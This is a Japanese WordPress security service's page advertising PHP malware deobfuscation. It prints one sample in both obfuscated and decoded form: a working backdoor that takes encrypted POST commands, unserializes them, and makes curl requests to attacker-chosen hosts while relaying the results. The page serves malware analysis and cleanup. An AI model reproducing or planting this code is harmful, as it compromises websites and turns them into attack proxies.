Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php function _1111189473($i){$a=Array('5.3.0',"%%vda8303j9","f3pdosjflnsd890g%%","%%NOGIPfdspFJdf","iPSmnSpojpqwoDPFJP%%","urls","paths","paths","paths","paths","files","files","files","files","fcf01cb6-d298-4251-97e9-1fd0a71558b9","","request","request","GET","headers","headers","post_rawdata","post_rawdata","post_params","post_params","get_params","get_params","cookie_params","cookie_params","math_results","not_substr","math_results","substr","","math_results","substr","math_results","substr","","math_results","regexp","math_results","regexp","","request_timeout","request_timeout","connection_timeout","connection_timeout","return_results","return_results","urls","urls","urls","domains","meta","meta","/\{\{(.*?)\}\}/",": ","Cookie: ","=",";","?",'POST',"domain","url","macros","macros","post_param","post_param","post_param","return_data","return_data",'request_option',"%%%NDOS039","dNDIOF%%%","%%%mfpODPM","EWpo345ODf%%%");return $a[$i];} ?><?php class Check{public static function l__0(){if(isset($_POST['checks'])){$_0=curl_multi_init();if(version_compare(PHP_VERSION,_1111189473(0))<round(0)){echo _1111189473(1) ._1111189473(2);exit();}echo _1111189473(3) ._1111189473(4);exit();}}}class TaskGenerator{private static $_1=array('Accept-Language: en-US,en;q=0.5','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36',);private static $_2=Array();private static function l__1($_3){if(empty($_3["urls"])){return Array();}$_3=$_3[_1111189473(5)];if(isset($_3[_1111189473(6)])&&!empty($_3[_1111189473(7)])&& is_array($_3[_1111189473(8)])){$_4=$_3[_1111189473(9)];}else{$_4=Array();}if(isset($_3[_1111189473(10)])&&!empty($_3[_1111189473(11)])&& is_array($_3[_1111189473(12)])){$_5=$_3[_1111189473(13)];}else{$_5=Array();}$_6=Array();if($_4){foreach($_4 as $_7){if($_5){foreach($_5 as $_8){$_6[]=$_7 .$_8;}}else{$_6[]=$_7;}}}else if($_5){foreach($_5 as $_8){$_6[]=$_8;}}return $_6;}public static function l__2($_9){$_9=base64_decode($_9);$_10=_1111189473(14);$_11=_1111189473(15);for($_12=0;$_12<strlen($_9);){for($_13=0;$_13<strlen($_10)&& $_12<strlen($_9);$_13++,$_12++){$_11 .= chr(ord($_9[$_12])^ord($_10[$_13]));}}return $_11;}public static function l__3($_9){$_9=TaskGenerator::l__2($_9);$_14=unserialize($_9);return $_14;}public static function l__4($_14){$_15=array();$_16=!empty($_14[_1111189473(16)])?$_14[_1111189473(17)]:_1111189473(18);$_17=!empty($_14[_1111189473(19)])?$_14[_1111189473(20)]:TaskGenerator::$_1;$_18=!empty($_14[_1111189473(21)])?$_14[_1111189473(22)]:NULL;$_19=!empty($_14[_1111189473(23)])?$_14[_1111189473(24)]:Array();$_20=!empty($_14[_1111189473(25)])?$_14[_1111189473(26)]:Array();$_21=!empty($_14[_1111189473(27)])?$_14[_1111189473(28)]:Array();$_22=!empty($_14[_1111189473(29)][_1111189473(30)])?$_14[_1111189473(31)][_1111189473(32)]:_1111189473(33);$_23=!empty($_14[_1111189473(34)][_1111189473(35)])?$_14[_1111189473(36)][_1111189473(37)]:_1111189473(38);$_24=!empty($_14[_1111189473(39)][_1111189473(40)])?$_14[_1111189473(41)][_1111189473(42)]:_1111189473(43);$_25=!empty($_14[_1111189473(44)])?intval($_14[_1111189473(45)]):round(0+3+3+3+3+3);$_26=!empty($_14[_1111189473(46)])?intval($_14[_1111189473(47)]):round(0+2.5+2.5);$_27=!empty($_14[_1111189473(48)])?$_14[_1111189473(49)]:TaskGenerator::$_2;$_28=TaskGenerator::l__1($_14);if(isset($_14[_1111189473(50)])&&!empty($_14[_1111189473(51)])){foreach($_14[_1111189473(52)][_1111189473(53)]as $_29 => $_30){foreach($_28 as $_31){$_32=$_29 .$_31;$_33=new Task();$_33->_16=$_16;$_33->_29=$_29;$_33->_34=$_32;$_33->_25=$_25;$_33->_26=$_26;$_33->_17=$_17;$_33->_18=$_18;$_33->_19=$_19;$_33->_20=$_20;$_33->_21=$_21;$_33->_30=$_30;if(isset($_14[_1111189473(54)]))$_33->_35=$_14[_1111189473(55)];$_33->_22=$_22;$_33->_23=$_23;$_33->_24=$_24;$_33->_27=$_27;$_15[]=$_33;}}}return $_15;}}class Task{public $_16;public $_29;public $_34;public $_17;public $_18;public $_19;public $_20;public $_21;public $_30;public $_35;private $_36;public $_23;public $_24;public $_27;public $_25;public $_26;private $_37=NULL;private $_11=Array();private function l__5($_38){$_39="";if(isset($this->_36[$_38])){return $this->_36[$_38];}if(!empty($this->_30[$_38])){$_40=array_rand($this->_30[$_38]);$_39=$this->_30[$_38][$_40];$this->_36[$_38]=$_39;unset($this->_30[$_38][$_40]);}else if(!empty($this->_35[$_38])){$_40=array_rand($this->_35[$_38]);$_39=$this->_35[$_38][$_40];$this->_36[$_38]=$_39;unset($this->_35[$_38][$_40]);}return $_39;}private function l__6($_9){if(is_array($_9)){$_41=Array();$_42=array_keys($_9);foreach($_42 as $_10){$_43=$this->l__6($_10);$_44=$this->l__6($_9[$_10]);$_41[$_43]=$_44;}return $_41;}else if(is_string($_9)){preg_match_all(_1111189473(56),$_9,$_45);for($_12=round(0);$_12<sizeof($_45[round(0)]);$_12++){$_46=$_45[round(0)][$_12];$_38=$_45[round(0+0.5+0.5)][$_12];$_47=$this->l__5($_38);$_9=str_replace($_46,$_47,$_9);}return $_9;}else{return $_9;}}private function l__7(){$_41=Array();$_17=$this->l__6($this->_17);$_21=$this->l__6($this->_21);foreach($_17 as $_10=>$_48){$_41[]=$_10 ._1111189473(57) .$_48;}$_49=_1111189473(58);foreach($_21 as $_10=>$_48){$_49 .= $_10 ._1111189473(59) .$_48 ._1111189473(60);}$_41[]=$_49;return $_41;}public function l__8(){if(!empty($this->_37)){return $this->_37;}if(!empty($this->_20)){$_34=$this->_34 ._1111189473(61) .http_build_query($this->l__6($this->_20));}else{$_34=$this->_34;}$_37=curl_init($_34);curl_setopt($_37,CURLOPT_RETURNTRANSFER,true);curl_setopt($_37,CURLOPT_CONNECTTIMEOUT,$this->_26);curl_setopt($_37,CURLOPT_TIMEOUT,$this->_25);curl_setopt($_37,CURLINFO_HEADER_OUT,true);curl_setopt($_37,CURLOPT_HEADER,round(0+0.25+0.25+0.25+0.25));curl_setopt($_37,CURLOPT_VERBOSE,round(0+0.25+0.25+0.25+0.25));curl_setopt($_37,CURLOPT_FOLLOWLOCATION,round(0+0.5+0.5));curl_setopt($_37,CURLOPT_CUSTOMREQUEST,$this->_16);if($this->_17){curl_setopt($_37,CURLOPT_HTTPHEADER,$this->l__7());}if(!empty($this->_19)||!empty($this->_18)){if(!empty($this->_18)){curl_setopt($_37,CURLOPT_POSTFIELDS,$this->l__6($this->_18));}else{curl_setopt($_37,CURLOPT_POSTFIELDS,http_build_query($this->l__6($this->_19)));}curl_setopt($_37,CURLOPT_POST,round(0+0.5+0.5));curl_setopt($_37,CURLOPT_CUSTOMREQUEST,_1111189473(62));}curl_setopt($_37,CURLOPT_BUFFERSIZE,round(0+25.6+25.6+25.6+25.6+25.6));curl_setopt($_37,CURLOPT_NOPROGRESS,false);$this->_37=$_37;return $_37;}public function l__9($_11){$_50=FALSE;if(!empty($this->_23)){if(strpos($_11,$this->_23)!== FALSE){$_50=TRUE;}}if(!empty($this->_24)){if(preg_match($this->_24,$_11)){$_50=TRUE;}}if(!empty($this->_22)){if(strpos($_11,$this->_22)!== FALSE){$_50=FALSE;}}if($_50){$this->_11[_1111189473(63)]=$this->_29;$this->_11[_1111189473(64)]=$this->_34;if(in_array(_1111189473(65),$this->_27)){$this->_11[_1111189473(66)]=$this->_36;}if(in_array(_1111189473(67),$this->_27)){if(!empty($this->_18)){$this->_11[_1111189473(68)]=$this->_18;}else{$this->_11[_1111189473(69)]=$this->_19;}}if(in_array(_1111189473(70),$this->_27)){$this->_11[_1111189473(71)]=$_11;}}return $this->_11;}public function l__10(){return $this->_11;}}class TaskExecutor{public static function l__11($_15,$_51){$_0=curl_multi_init();foreach($_15 as $_33){curl_multi_add_handle($_0,$_33->l__8());}$_52=NULL;do{curl_multi_exec($_0,$_52);}while($_52>round(0));foreach($_15 as $_33){$_33->l__9(curl_multi_getcontent($_33->l__8()));curl_multi_remove_handle($_0,$_33->l__8());}curl_multi_close($_0);return $_15;}}$_53=TaskGenerator::l__3($_POST[_1111189473(72)]);;if(!$_53){exit();}$_15=TaskGenerator::l__4($_53);$_15=TaskExecutor::l__11($_15,-round(0+0.25+0.25+0.25+0.25));$_54=Array();foreach($_15 as $_33){$_11=$_33->l__10();if(!empty($_11)){$_54[]=$_11;}}echo _1111189473(73) ._1111189473(74) .serialize($_54) ._1111189473(75) ._1111189473(76) .PHP_EOL;
<?php function _1111189473($i) { $a = array('5.3.0', "%%vda8303j9", "f3pdosjflnsd890g%%", "%%NOGIPfdspFJdf", "iPSmnSpojpqwoDPFJP%%", "urls", "paths", "paths", "paths", "paths", "files", "files", "files", "files", "fcf01cb6-d298-4251-97e9-1fd0a71558b9", "", "request", "request", "GET", "headers", "headers", "post_rawdata", "post_rawdata", "post_params", "post_params", "get_params", "get_params", "cookie_params", "cookie_params", "math_results", "not_substr", "math_results", "substr", "", "math_results", "substr", "math_results", "substr", "", "math_results", "regexp", "math_results", "regexp", "", "request_timeout", "request_timeout", "connection_timeout", "connection_timeout", "return_results", "return_results", "urls", "urls", "urls", "domains", "meta", "meta", "/\\{\\{(.*?)\\}\\}/", ": ", "Cookie: ", "=", ";", "?", 'POST', "domain", "url", "macros", "macros", "post_param", "post_param", "post_param", "return_data", "return_data", 'request_option', "%%%NDOS039", "dNDIOF%%%", "%%%mfpODPM", "EWpo345ODf%%%"); return $a[$i]; } class Check { public static function l__0() { if (isset($_POST['checks'])) { $_0 = curl_multi_init(); if (version_compare(PHP_VERSION, _1111189473(0)) < round(0)) { echo _1111189473(1) . _1111189473(2); exit; } echo _1111189473(3) . _1111189473(4); exit; } } } class TaskGenerator { private static $_1 = array('Accept-Language: en-US,en;q=0.5', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'); private static $_2 = array(); private static function l__1($_3) { if (empty($_3["urls"])) { return array(); } $_3 = $_3[_1111189473(5)]; if (isset($_3[_1111189473(6)]) && !empty($_3[_1111189473(7)]) && is_array($_3[_1111189473(8)])) { $_4 = $_3[_1111189473(9)]; } else { $_4 = array(); } if (isset($_3[_1111189473(10)]) && !empty($_3[_1111189473(11)]) && is_array($_3[_1111189473(12)])) { $_5 = $_3[_1111189473(13)]; } else { $_5 = array(); } $_6 = array(); if ($_4) { foreach ($_4 as $_7) { if ($_5) { foreach ($_5 as $_8) { $_6[] = $_7 . $_8; } } else { $_6[] = $_7; } } } else { if ($_5) { foreach ($_5 as $_8) { $_6[] = $_8; } } } return $_6; } public static function l__2($_9) { $_9 = base64_decode($_9); $_10 = _1111189473(14); $_11 = _1111189473(15); for ($_12 = 0; $_12 < strlen($_9);) { for ($_13 = 0; $_13 < strlen($_10) && $_12 < strlen($_9); $_13++, $_12++) { $_11 .= chr(ord($_9[$_12]) ^ ord($_10[$_13])); } } return $_11; } public static function l__3($_9) { $_9 = TaskGenerator::l__2($_9); $_14 = unserialize($_9); return $_14; } public static function l__4($_14) { $_15 = array(); $_16 = !empty($_14[_1111189473(16)]) ? $_14[_1111189473(17)] : _1111189473(18); $_17 = !empty($_14[_1111189473(19)]) ? $_14[_1111189473(20)] : TaskGenerator::$_1; $_18 = !empty($_14[_1111189473(21)]) ? $_14[_1111189473(22)] : NULL; $_19 = !empty($_14[_1111189473(23)]) ? $_14[_1111189473(24)] : array(); $_20 = !empty($_14[_1111189473(25)]) ? $_14[_1111189473(26)] : array(); $_21 = !empty($_14[_1111189473(27)]) ? $_14[_1111189473(28)] : array(); $_22 = !empty($_14[_1111189473(29)][_1111189473(30)]) ? $_14[_1111189473(31)][_1111189473(32)] : _1111189473(33); $_23 = !empty($_14[_1111189473(34)][_1111189473(35)]) ? $_14[_1111189473(36)][_1111189473(37)] : _1111189473(38); $_24 = !empty($_14[_1111189473(39)][_1111189473(40)]) ? $_14[_1111189473(41)][_1111189473(42)] : _1111189473(43); $_25 = !empty($_14[_1111189473(44)]) ? intval($_14[_1111189473(45)]) : round(15); $_26 = !empty($_14[_1111189473(46)]) ? intval($_14[_1111189473(47)]) : round(5.0); $_27 = !empty($_14[_1111189473(48)]) ? $_14[_1111189473(49)] : TaskGenerator::$_2; $_28 = TaskGenerator::l__1($_14); if (isset($_14[_1111189473(50)]) && !empty($_14[_1111189473(51)])) { foreach ($_14[_1111189473(52)][_1111189473(53)] as $_29 => $_30) { foreach ($_28 as $_31) { $_32 = $_29 . $_31; $_33 = new Task(); $_33->_16 = $_16; $_33->_29 = $_29; $_33->_34 = $_32; $_33->_25 = $_25; $_33->_26 = $_26; $_33->_17 = $_17; $_33->_18 = $_18; $_33->_19 = $_19; $_33->_20 = $_20; $_33->_21 = $_21; $_33->_30 = $_30; if (isset($_14[_1111189473(54)])) { $_33->_35 = $_14[_1111189473(55)]; } $_33->_22 = $_22; $_33->_23 = $_23; $_33->_24 = $_24; $_33->_27 = $_27; $_15[] = $_33; } } } return $_15; } } class Task { public $_16; public $_29; public $_34; public $_17; public $_18; public $_19; public $_20; public $_21; public $_30; public $_35; private $_36; public $_23; public $_24; public $_27; public $_25; public $_26; private $_37 = NULL; private $_11 = array(); private function l__5($_38) { $_39 = ""; if (isset($this->_36[$_38])) { return $this->_36[$_38]; } if (!empty($this->_30[$_38])) { $_40 = array_rand($this->_30[$_38]); $_39 = $this->_30[$_38][$_40]; $this->_36[$_38] = $_39; unset($this->_30[$_38][$_40]); } else { if (!empty($this->_35[$_38])) { $_40 = array_rand($this->_35[$_38]); $_39 = $this->_35[$_38][$_40]; $this->_36[$_38] = $_39; unset($this->_35[$_38][$_40]); } } return $_39; } private function l__6($_9) { if (is_array($_9)) { $_41 = array(); $_42 = array_keys($_9); foreach ($_42 as $_10) { $_43 = $this->l__6($_10); $_44 = $this->l__6($_9[$_10]); $_41[$_43] = $_44; } return $_41; } else { if (is_string($_9)) { preg_match_all(_1111189473(56), $_9, $_45); for ($_12 = round(0); $_12 < sizeof($_45[round(0)]); $_12++) { $_46 = $_45[round(0)][$_12]; $_38 = $_45[round(1.0)][$_12]; $_47 = $this->l__5($_38); $_9 = str_replace($_46, $_47, $_9); } return $_9; } else { return $_9; } } } private function l__7() { $_41 = array(); $_17 = $this->l__6($this->_17); $_21 = $this->l__6($this->_21); foreach ($_17 as $_10 => $_48) { $_41[] = $_10 . _1111189473(57) . $_48; } $_49 = _1111189473(58); foreach ($_21 as $_10 => $_48) { $_49 .= $_10 . _1111189473(59) . $_48 . _1111189473(60); } $_41[] = $_49; return $_41; } public function l__8() { if (!empty($this->_37)) { return $this->_37; } if (!empty($this->_20)) { $_34 = $this->_34 . _1111189473(61) . http_build_query($this->l__6($this->_20)); } else { $_34 = $this->_34; } $_37 = curl_init($_34); curl_setopt($_37, CURLOPT_RETURNTRANSFER, true); curl_setopt($_37, CURLOPT_CONNECTTIMEOUT, $this->_26); curl_setopt($_37, CURLOPT_TIMEOUT, $this->_25); curl_setopt($_37, CURLINFO_HEADER_OUT, true); curl_setopt($_37, CURLOPT_HEADER, round(1.0)); curl_setopt($_37, CURLOPT_VERBOSE, round(1.0)); curl_setopt($_37, CURLOPT_FOLLOWLOCATION, round(1.0)); curl_setopt($_37, CURLOPT_CUSTOMREQUEST, $this->_16); if ($this->_17) { curl_setopt($_37, CURLOPT_HTTPHEADER, $this->l__7()); } if (!empty($this->_19) || !empty($this->_18)) { if (!empty($this->_18)) { curl_setopt($_37, CURLOPT_POSTFIELDS, $this->l__6($this->_18)); } else { curl_setopt($_37, CURLOPT_POSTFIELDS, http_build_query($this->l__6($this->_19))); } curl_setopt($_37, CURLOPT_POST, round(1.0)); curl_setopt($_37, CURLOPT_CUSTOMREQUEST, _1111189473(62)); } curl_setopt($_37, CURLOPT_BUFFERSIZE, round(128.0)); curl_setopt($_37, CURLOPT_NOPROGRESS, false); $this->_37 = $_37; return $_37; } public function l__9($_11) { $_50 = FALSE; if (!empty($this->_23)) { if (strpos($_11, $this->_23) !== FALSE) { $_50 = TRUE; } } if (!empty($this->_24)) { if (preg_match($this->_24, $_11)) { $_50 = TRUE; } } if (!empty($this->_22)) { if (strpos($_11, $this->_22) !== FALSE) { $_50 = FALSE; } } if ($_50) { $this->_11[_1111189473(63)] = $this->_29; $this->_11[_1111189473(64)] = $this->_34; if (in_array(_1111189473(65), $this->_27)) { $this->_11[_1111189473(66)] = $this->_36; } if (in_array(_1111189473(67), $this->_27)) { if (!empty($this->_18)) { $this->_11[_1111189473(68)] = $this->_18; } else { $this->_11[_1111189473(69)] = $this->_19; } } if (in_array(_1111189473(70), $this->_27)) { $this->_11[_1111189473(71)] = $_11; } } return $this->_11; } public function l__10() { return $this->_11; } } class TaskExecutor { public static function l__11($_15, $_51) { $_0 = curl_multi_init(); foreach ($_15 as $_33) { curl_multi_add_handle($_0, $_33->l__8()); } $_52 = NULL; do { curl_multi_exec($_0, $_52); } while ($_52 > round(0)); foreach ($_15 as $_33) { $_33->l__9(curl_multi_getcontent($_33->l__8())); curl_multi_remove_handle($_0, $_33->l__8()); } curl_multi_close($_0); return $_15; } } $_53 = TaskGenerator::l__3($_POST[_1111189473(72)]); if (!$_53) { exit; } $_15 = TaskGenerator::l__4($_53); $_15 = TaskExecutor::l__11($_15, -round(1.0)); $_54 = array(); foreach ($_15 as $_33) { $_11 = $_33->l__10(); if (!empty($_11)) { $_54[] = $_11; } } echo _1111189473(73) . _1111189473(74) . serialize($_54) . _1111189473(75) . _1111189473(76) . PHP_EOL;
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.